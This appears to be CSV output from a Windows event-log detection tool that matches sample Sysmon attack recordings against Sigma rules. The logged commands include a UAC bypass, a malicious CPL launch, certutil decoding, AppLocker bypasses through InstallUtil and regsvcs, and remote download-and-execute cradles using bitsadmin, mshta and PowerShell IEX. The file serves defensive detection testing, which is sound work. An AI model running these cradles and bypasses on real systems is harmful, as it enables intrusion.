2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" : Path: C:\Users\IEUser\Downloads\UACBypass.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:41.424 +09:00,MSEDGEWIN10,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.033 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.161 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6820 324 0000022557280720 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: PrivEsc - UACBypass Mocking Trusted WinFolders : Command: ""C:\Windows \System32\winSAT.exe"" formal : Path: C:\Windows \System32\winSAT.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\UACBypass.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-28 07:43:42.392 +09:00,MSEDGEWIN10,1,critical,TrustedPath UAC Bypass Pattern,,rules/sigma/process_creation/win_susp_uac_bypass_trustedpath.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_7_1_uacbypass_windirectory_mocking.evtx
2019-07-30 06:11:17.364 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\control.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\control.exe"" ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.587 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"", : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\rundll32.exe"" Shell32.dll,Control_RunDLL ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:17.621 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\wscript.exe"" /e:JScript.Encode /nologo C:\Users\IEUser\AppData\Local\Temp\info.txt : Path: C:\Windows\SysWOW64\wscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 ""C:\Users\IEUser\Downloads\Invoice@0582.cpl"",",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:11:19.098 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_1_11_rundll32_cpl_ostap.evtx
2019-07-30 06:32:55.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6336 362 00000298E04230D0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: certutil -f -decode fi.b64 AllTheThings.dll : Path: C:\Windows\System32\certutil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c certutil -f -decode fi.b64 AllTheThings.dll ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Suspicious Certutil Command,,rules/sigma/process_creation/win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" : Path: C:\Windows\System32\bitsadmin.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Bitsadmin Download,,rules/sigma/process_creation/win_process_creation_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); : Path: C:\Windows\System32\mshta.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Mshta JavaScript Execution,,rules/sigma/process_creation/win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close();",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: timeout 5 : Path: C:\Windows\System32\timeout.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,PowerShell Download from URL,,rules/sigma/process_creation/win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/process_creation_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Encoded PowerShell Command Line,,rules/sigma/process_creation/win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: MSEDGEWIN10\IEUser : Parent Command: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx
